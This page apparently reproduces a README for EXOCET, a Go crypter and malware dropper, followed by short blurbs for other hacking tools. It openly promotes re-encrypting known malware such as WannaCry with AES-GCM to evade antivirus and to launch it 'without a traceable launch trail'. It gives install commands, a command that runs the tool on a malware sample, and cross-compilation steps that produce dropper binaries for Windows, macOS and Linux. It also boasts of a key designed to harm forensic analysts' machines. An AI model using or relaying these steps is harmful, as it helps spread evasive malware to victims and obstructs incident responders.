EXOCET is superior to Metasploit’s “Evasive Payloads” modules as EXOCET uses AES-256 in GCM Mode (Galois/Counter Mode). Metasploit’s Evasion Payloads uses a easy to detect RC4 encryption. While RC4 can decrypt faster, AES-256 is much more difficult to ascertain the intent of the malware.
However, it is possible to use Metasploit to build a Evasive Payload, and then chain that with EXOCET. So EXOCET will decrypt via AES-256, and then the Metasploit Evasive Payload then decrypts itself from RC4.
Much like my previous project, DarkLordObama, this toolkit is designed to be a delivery/launch vehicle, much like Veil-Evasion does.
Dark Lord Obama Project
However, EXOCET is not limited to a single codebase or platforms that are running Python. EXOCET works on ALL supported platforms and architectures that Go supports.
EXOCET, is effectively a crypter-type malware dropper that can recycle easily detectable payloads like WannaCry, encrypt them using AES-GCM (Galois/Counter Mode), which is more secure than AES-CBC, and then create a dropper file for a majority of architectures and platforms out there.
Basically…
That means 32-bit, and 64-bit architectures, and it works on Linux, Windows, Macs, Unix, Android, iPhone, etc. You take, anything, and I mean ANYTHING, like the 1988 Morris Worm that nearly brought down the internet (which exploited a flaw in the fingerd listener daemon on UNIX), and make it a viable cyberweapon again.
EXOCET is designed to be used with the DSX Program, or the “Cyber Metal Gear” as I envisioned it. Being able to launch and proliferate dangerous malware without a traceable launch trail.
EXOCET is written entirely in Go.
EXOCET, regardless of which binary you use to run it, requires Golang to work. By default, it generates a crypter .go file.
sudo apt-get update && sudo apt-get install -y golang
go get github.com/tanc7/EXOCET-AV-Evasion
go run EXOCET.go detectablemalware.exe outputmalware.go
A key is automatically generated for you. The key is 64-characters long and is entirely composed of bash and cmd.exe shell pipe redirectors to confuse and disrupt brute-forcing attempts against the key by causing unpredictable, destructive behavior on the forensic analyst’s device.
For 64-bit Windows Targets…
env GOOS=windows GOARCH=amd64 go build -ldflags “-s -w” -o outputMalware.exe outputmalware.go
And out comes a outputmalware.exe
file
For 64-bit MacOS Targets
env GOOS=darwin GOARCH=amd64 go build -ldflags “-s -w” -o outputMalware.macho outputmalware.go
For 64-bit Linux Targets
env GOOS=linux GOARCH=amd64 go build -ldflags “-s -w” -o outputMalware.elf outputmalware.go
Got it! Below is the updated README.md file with instructions for downloading the project on…
Termo-Kali bridges the gap between powerful Linux capabilities and the convenience of mobile devices by…
Welcome to the Ethical Hacking Quiz Application, designed to help learners test their knowledge of…
The WPA2 Handshake Automation Tool is a Python3 script designed to simplify the process of setting up…
A custom bash script designed to streamline your startup process and enhance your scripting skills.…
Welcome to the Cybersecurity Toolkit, a collection of essential Python tools designed for penetration testing…